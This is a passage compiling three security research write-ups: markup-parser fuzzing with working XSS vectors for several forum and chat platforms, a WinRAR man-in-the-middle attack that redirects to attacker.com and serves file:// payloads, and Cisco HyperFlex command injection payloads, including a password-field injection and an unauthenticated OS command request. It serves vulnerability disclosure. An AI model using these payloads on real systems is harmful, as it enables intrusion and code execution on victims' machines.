[video=liveleak;123]https://www.liveleak.com/view?i=715_1513068362[font=qwe]qwe[/font][/video]
[video=dailymotion;123]https://www.dailymotion.com/video/x6hx1c8[font=qwe]qwe[/font][/video]
[FONT=Ari[font=qwe]qwe[/font]al]qwe[/FONT]
[SIZE=11[font=qwe]qwe[/font]px]qwe[/SIZE]
[FONT="Ari[font=qwe]qwe[/font]al"]qwe[/FONT]
[SIZE="11[font=qwe]qwe[/font]px"]qwe[/SIZE]
[email][email protected][font=qwe]qwe[/font]e.com[/email]
[[email protected][font=qwe]qwe[/font]e.com]qwe[/email]
[url]http://[email protected][font=qwe]qwe[/font]e.com[/url]
[url=http://[email protected][font=qwe]qwe[/font]e.com]qwe[/url]
[email="[email protected][font=qwe]qwe[/font]e.com"]qwe[/email]
[url="http://[email protected][font=qwe]qwe[/font]e.com"]qwe[/url]


### Step 1

Enumerate all possible strings that could be converted to HTML code and save to List B:

http://google.com/?param=value
[color=colorname]text[/color]
[b]text[/b]
:smile:


### Step 2

Save the lines that allow you to pass arguments in HTML as insertion points to List A and mark where the payloads from List B will be inserted. You can also use List C for checking HTML characters sanitization, Unicode support or 1-byte fuzzing:

http://google.com/?param=va%listC%%listB%lue
[color=color%listC%%listB%name]text[/color]


### Step 3

Generate the fuzz-list using  Lists A, B and C:

http://google.com/?param=va<[color=colorname]text[/color]lue
[color=color<:smile:name]text[/color]


## Detection of anomalies

### Method 1 – visual

You can use this method on desktop/mobile apps when you can’t see HTTP traffic or HTML source of returned messages.

Expected results: chunks of HTML code (">, " >, "/>) become visible.

### Method 2 – regular expressions

This method can be used when you apply fully automated fuzzing.

For example, we use a regex that searches for an opening HTML tag character < inside of an HTML attribute:

We applied this fuzzing technique against the vBulletin board using BurpSuite Intruder. We sorted the resulting table by the seventh column that contains the true/false condition of the used regex. At the bottom of the screenshot, you can see the HTML source of the successful test case, with the substring found and highlighted by our regex rule:

## Discovered vulnerabilities

It’s not a full list, some vendors not patched and something we can’t disclose…

### vBulletin < 5.6.4 PL1, 5.6.3 PL1, 5.6.2 PL2

CVE: not assigned

XSS vector (video BBcode + font BBcode):

[VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]

HTML output:

<a class="video-frame h-disabled" href="a<span style="font-family:a onmouseover=alert(location) a">a</span>a" data-vcode="000" data-vprovider="aaa">

### MyBB

CVE: CVE-2021-27279.

XSS vector (emal BBcode + email BBcode another syntax):

[email][email protected]?[[email protected]? onmouseover=alert(1) a]a[/email][/email]

HTML output:

<a href="mailto:[email protected]?<a href="mailto:[email protected]? onmouseover=alert(1) a" class="mycode_email">a" class="mycode_email">[email protected]?[[email protected]? onmouseover=alert(1) a]a</a></a>

### PMWiki

CVE: CVE-2021-29231

XSS vector (div title wikitext + font-family wikitext):

%define=aa font-family='a="a'%

test


HTML output:

<div title='a<span  style='font-family: a="a;'> a' style='a' >"onmouseover="alert(1)"</span> <p>test

### Rocket.Chat

CVE: CVE-2021-22886

XSS vector (url parser + markdown url):

[ ](http://www.google.com)


HTML output:

<a href="http://www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a" target="_blank" rel="noopener noreferrer">www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a</a>

### XMB

CVE: CVE-2021-29399

XSS vector (URL BBcode + URL BBcode another syntax):

[url]http://a[url=http://onmouseover=alert(1)// a]a[/url][/url]

HTML output:

<a href='http://a<a href='http://onmouseover=alert(1)// a' onclick='window.open(this.href); return false;'>a' onclick='window.open(this.href); return false;'>http://a[url=http://onmouseover=alert(1)// a]a</a></a>

### SCEditor < 3 / SMF 2.1 – 2.1 RC3

CVE: not assigned

XSS vector (BBcode + BBcode):

[email][email protected][size="onfocus=alert(1) contenteditable tabindex=0 id=xss q"]a[/email].a[/size]

HTML output:

<a href="mailto:[email protected]<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font>">[email protected]<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font></a><font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">.a</font>

### PunBB

CVE: CVE-2021-28968

XSS vector (emal BBcode + url BBcode inside b BBcode):

[email][email protected][b][url]http://onmouseover=alert(1)//[/url][/b]a[/email]

HTML output:

<a href="mailto:[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a">[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a</a>

### Vanilla forums

CVE: not assigned

XSS vector (HTML <img alt> + HTML <img>):

<img alt="<img onerror=alert(1)//"<"> 

HTML output:

img alt="<img onerror=alert(1)//" src="src" />

## Recommendations for elimination

Based on our findings, we can say that one of the best options for sanitization that could protect even the parsers with the nesting conditions is the complete encoding of the user input to HTML entities:

For example, let us look at the Phorum CMS that has already been patched.

In the last version of this CMS, one of the BBcodes encodes all user input to HTML entities. And it’s an XSS when we tried to reproduce it on previous versions. This patch indeed is a great example:

my e-mail: [email][email protected][/email]

# WinRAR’s vulnerable trialware: when free software isn’t free

20 October 2021 at 14:01

In this article we discuss a vulnerability in the trial version of WinRAR which has significant consequences for the management of third-party software. This vulnerability allows an attacker to intercept and modify requests sent to the user of the application. This can be used to achieve Remote Code Execution (RCE) on a victim’s computer. It has been assigned the CVE ID – CVE-2021-35052.

## Background

WinRAR is an application for managing archive files on Windows operating systems. It allows for the creation and unpacking of common archive formats such as RAR and ZIP. It is distributed as trialware, allowing a user to experience the full features of the application for a set number of days. After which a user may continue to use the applications with some features disabled.

## Findings

We found this vulnerability by chance, in WinRAR version 5.70. We had installed and used the application for some period, when it produced a JavaScript error:

This was surprising as the error indicates that the Internet Explorer engine is rendering this error window.

After a few experiments, it became clear that once the trial period has expired, then about one time out of three launches of WinRAR.exe application result in this notification window being shown. This window uses mshtml.dll implementation for Borland C++ in which WinRAR has been written.

Microsoft MSHTML Remote Code Execution Vulnerability
CVE-2021-40444

We set up our local Burp Suite as a default Windows proxy and try to intercept traffic and to understand more about why this was happening and whether it would be possible to exploit this error. As the request is sent via HTTPS, the user of WinRAR will get a notification about the insecure self-signed certificate that Burp uses. However, in experience, many users click “Yes” to proceed, to use the application.

Looking at the request itself, we can see the version (5.7.0) and architecture (x64) of the WinRAR application:

GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com
Connection: close


### Modifying Responses to The End User

Next, we attempted to modify intercepted responses from WinRAR to the user. Instead of intercepting and changing the default domain “notifier.rarlab.com” responses each time with our malicious content, we noticed that if the response code is changed to “301 Moved Permanently” then the redirection to our malicious domain “attacker.com” will be cached and all requests will go to the “attacker.com”.

HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close


### Remote Code Execution

This Man-in-the-Middle attack requires ARP-spoofing, so we presume that a potential attacker already has access to the same network domain. This will put us into Zone 1 of the IE security zones. We attempted several different attack vectors to see what is feasible with this kind of access.

<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>


The code above depicts the spoofed response showing several possible attack vectors such as running applications, retrieving local host information, and running the calculator application.

Most of the attack vectors were successful but it should be noted that many result in an additional Windows security warning. For these to be a success, the user would need to click “Run” instead of “Cancel”.

However, there are some file types that can be run without the security warning appearing. These are:

• .DOCX
• .PDF
• .PY
• .RAR

Remote code execution is possible with RAR files in WinRAR against versions earlier than 5.7. This can be done via a well-known exploit, CVE-2018-20250.

## Conclusion

One of the biggest challenges an organization faces is the management of third-party software. Once installed, third-party software has access to read, write, and modify data on devices which access corporate networks. It’s impossible to audit every application that could be installed by a user and so policy is critical to managing the risk associated with external applications and balancing this risk against the business need for a variety of applications. Improper management can have wide reaching consequences.

# Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings

29 September 2021 at 13:57

In February 2021, we had the opportunity to assess the HyperFlex HX platform from Cisco during a routine customer engagement. This resulted in the detection of three significant vulnerabilities. In this article we discuss our findings and will explain why they exist in the platform, how they can be exploited and the significance of these vulnerabilities.

The vulnerabilities discussed have been assigned CVE ID’s and considered in Cisco’s subsequent Security Advisories (12). These are:

• CVE-2021-1497
Cisco HyperFlex HX Installer Virtual Machine Command Injection Vulnerability (CVSS Base Score: 9.8);
• CVE-2021-1498
Cisco HyperFlex HX Data Platform Command Injection Vulnerability (CVSS Base Score: 7.3);
• CVE-2021-1499
the Cisco HyperFlex the HX the Data Platform the Upload the File Vulnerability (CVSS Base Score: 5.3)

## Background

Cisco HyperFlex HX is a set of systems that combine various networks and computing resources into a single platform. One of the key features of the Cisco HyperFlex HX Data Platform(software-defined storage) is that it allows the end user to work with various storage devices and virtualize all elements and processes. This allows the user to easily back up data, allocate resources or clone resources. This concept is called Hyperconverged Infrastructure (HCI) . You read more about this on the Cisco website “Hyperconverged Infrastructure (the HCI): HyperFlex” and “Cisco HyperFlex the HX-the Series“.

Cisco HyperFlex HX comes with a web interface, which allows for easy configuration. The version we tested is the Cisco HyperFlex HX Data Platform v4.5.1a-39020. This can be seen below:

The HyperFlex platform is deployed as an image on the Ubuntu operating system. Our initial inspection showed that nginx 1.8.1 is used as the front-end web server. Knowing this, we decided to look at the nginx configuration files to see what else we could learn. The nginx configuration for “springpath” project are located in the /usr/share/springpath/storfs-misc/ directory. Springpath developed a distributed file system for hyperconvergence, which Cisco acquired in 2017.

Our priority was to gain access to the system management without any authentication. So we carried out a detailed examination of each route (location) in the configuration file. After a thorough investigation of the configuration file, we were able to prioritize areas to research further which may allow us to do so.

## Findings

### CVE -2021-1497: RCE through the password input field

Authentication is the process of verifying that a user is who they say they are. This process is frequently achieved by passing a username and a password to the application. Authorization is the process of granting access or denying access to a particular resource. Authentication and authorization are closely linked processes which determine who and what can be accessed by a user or application.

During our testing we noted that the process of authentication is handled by a third-party service. This is shown in the configuration file below:

By looking at the content of this configuration section, you can see that authentication process is handled by the binary file /opt/springpath/auth/auth. This service is a 64-bit ELF application. We noted that its size is larger than standard applications.. This could indicate a large amount of debugging information in the binary or a big compiled Golang project. The latter was quickly confirmed after reading section headers with the readelf command.

The auth binary handles several URL requests:

• /auth
• /auth/change
• /auth/logout
• /auth/verify
• /auth/sessionInfo

Most of these requests do not take user input, however the URL /auth and /auth/change allow user input through the parameter’s username, password and newPassword. The /auth page handles authentication. When a user enters their username and password, the HTTP request is sent as follows:

Analysis of the authentication application showed that the credentials, are retrieved in the main_loginHandler function through the standard functions net/http.(*Request).ParseForm. Next, the login and password are passed to the main_validateLogin function. This function retrieves the value from the username parameter and the corresponding user hash from the /etc/shadow file. If the user exists, then a further process is executed which checks the password entered through the main_validatePassword function, using the main_checkHash function.

The hash value is calculated by calling a one-line Python script via os/exec.Command:

python -c "import crypt; print(crypt.crypt(\"OUR_PASS\", \"$6$$\"));" Then the resulting hash value is extracted and compared with the value from /etc/shadow. The is a big problem with this method of executing commands from Python is that allows for command injection. This is a significant vulnerability; there is no input validation, and any user input is passed to os/exec.Command as it was entered. Additionally, commands are executed with the privileges of the application, in this case root. It’s therefore trivial to execute systems commands with malicious intention. For example we entered the following into the password field, causing a reboot of the system: 123", "6$$"));import os;os.system("reboot");print(crypt.crypt(" This vulnerability allows a malicious user to call a remote reverse shell with root privileges using only one HTTP request: The other URL that handles user input, /auth/change, also presents a way to execute arbitrary code. The password change is handled by the main_changeHandler function. This works much the same as the login process /auth. The existence of the user is checked using the same processes and the password hash is calculated using the same function main_checkHash. In the value of the new password, newPassword we were able to pass the same input, causing a system reboot:  123", "$6"));import os;os.system("reboot");print(crypt.crypt(" 

We found two ways to trigger the remote execution of arbitrary code, using the /auth and /auth/change endpoints. However, as both the password and newPassword parameters use the same function, main_checkHash to execute external commands, the vendor only issued one CVE. A more secure way to execute external commands in python is to use the sub-process module and to validate the arguments taken from user input before execution.

### CVE-2021-1498: Cisco HyperFlex HX Data Platform Command Injection Vulnerability

We analyzed the nginx configuration file and noticed that the /storfs-asup endpoint redirects all requests to the local Apache Tomcat server at TCP port 8000.

We then looked at the Apache Tomcat configuration file, web.xml, we found:

From this file it is clear that the /storfs-asup URL is processed by the StorfsAsup class, located at /var/lib/tomcat8/webapps/ROOT/WEB-INF/classes/com/storvisor/sysmgmt/service/StorfsAsup.class.

public class StorfsAsup extends HttpServlet {
...
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String action = request.getParameter("action");
if (action == null) {
String msg = "Action for the servlet need be specified.";
writeErrorResponse(response, msg);
return;
}
try {
String token = request.getParameter("token");
StringBuilder cmd = new StringBuilder();
cmd.append("exec /bin/storfs-asup ");
cmd.append(token);
String mode = request.getParameter("mode");
cmd.append("  ");
cmd.append(mode);
cmd.append("  > /dev/null");
logger.info("storfs-asup cmd to run : " + cmd);
ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
logger.info("Starting the storfs-asup now: ");
long startTime = System.currentTimeMillis();
Process p = pb.start();
...
}
...
}
}

When analyzing this class, we noticed that the parameters received from the user are not filtered in any way or validated in anyway. They are passed to a string, which is subsequently executed as an operating system command. Based on this information, we can form a malicious GET request, that will be executed as an OS command.

GET /storfs-asup/?Action=asd&token=%60[any_OS_command]%60 HTTP/1.1
Host: 192.168.31.76
Connection: close



This results in the execution of arbitrary commands on the server from an unauthenticated user.

It is worth noting that the web path /storfs-asup is only available if port 80 is accessible externally. To exploit the vulnerability through port 443, the request needs to be modified to use the path /crossdomain.xml/..;/storfs-asup/. This works because the nginx configuration file specifies that all requests starting with /crossdomain.xml are proxied to Tomcat and using the well-known directory traversal tomcat technique “..;/“, we can access any servlet on the tomcat web server.

### CVE-2021-1499: Cisco HyperFlex HX Data Platform File Upload Vulnerability

Closer inspection of the nginx configuration file showed us the following location for file uploads:

To request this URL, no authorization is required and the path is accessible externally. As is the vulnerability CVE-2021-1498, this is setup in a similar way. A request to the proxy application which is listening on port 8000 for incoming connections.

As an experiment, we sent a multipart request for directory traversal and it was accepted.

As a result, the file with the name passwd9 was created for the user “tomcat8” in the specified directory:

The complete lack of authentication means that we are able to download any arbitrary files to any location on the file system with “tomcat8” user privileges. This is a significant oversight of the developer’s part.

During the process of publishing this paper we gained a broader understanding of the vulnerability allowing us to execute arbitrary code. The vulnerability seems a lot less harmless now, than it did before. The details are available at the following link.

### Not every mistake is a mistake

The default route in the nginx configuration file also brought our attention. This route handles all HTTP requests that do not meet any of the other described rules in the configuration file. These requests are redirected to port 8002, which is only available internally.

As with the auth binary, this route is handled by the installer 64-bit ELF application and is also written in Golang.

Assessment showed that this application is a compiled 64-bit Golang project. This application was made for handling the /api/* requests. To work with the API interface, it is necessary to have an authorization token. The installer binary handles the following endpoints:

• /api/run
• /api/orgs
• /api/poll
• /api/about
• /api/proxy
• /api/reset
• /api/config
• /api/fields
• /api/upload
• /api/restart
• /api/servers
• /api/query_hfp
• /api/hypervisor
• /api/datacenters
• /api/logOnServer
• /api/add_ip_block
• /api/job/{job_id}
• /api/tech_support
• /api/write_config
• /api/validate_ucsm
• /api/update_catalog
• /api/upload_catalog
• /api/validate_login

Though the initial requirement for this research was to find vulnerabilities that don’t require prerequisites or authentication, this finding requires a user to be logged into the Cisco HyperFlex web interface. We analyzed the endpoint handlers and found two requests that were working with the file system. The /api/update_catalog and /api/upload routes allowed us to upload arbitrary files to a specific directory. The handlers responsible for working with the URL data are main_uploadCatalogHandler and main_uploadHandler.

In the first case, the files we transferred were written to the /opt/springpath/packages/ directory. Using a simple path traversal attack, we were able to write a file outside of this directory in an arbitrary location on the system.

As a result, we are able to write files to any place on the system as these requests are made with root privileges.

The second example of requests causes a file written to the /var/www/localhost/images/` directory, from the web interface. The works in a similar way to the previous request by changing the file name in an HTTP multipart POST request. This allows a malicious user to create a file anywhere on the file system.

Cisco does not consider these as vulnerabilities, assuming that if the attacker knows customer credentials, it would be possible to log in via enabled SSH server. However, we still consider this code to be poorly implemented.

## Conclusion

This research project started as an opportunity during a routine customer engagement. What we found is three significant vulnerabilities. These vulnerabilities are the result of a lack of input validation, improper management of authentication and authorization, and reliance on third party code. These can be mitigated by following secure coding best practices and ensuring that security testing is an integral part of the development process.

Command injection vulnerabilities remain a significant issue in industry, despite the development of best practices such as SSDLC (Secure Software Development Lifecycle). This could be solved in two parts. First if there is appetite in the industry to make best practices a requirement through standards. Second, if external testing is implemented to assess if standards are adhered two.

Finally, it should be noted that third-party products are often not up to the same rigorous security standards that are implemented in existing product lines. The acquisition and integration of third-party products is a difficult path to manage. Every acquisition should involve thorough review of coding practices and security testing. In some cases, they may benefit from a complete overall to ensure that data is handled consistently between components and in a secure manner.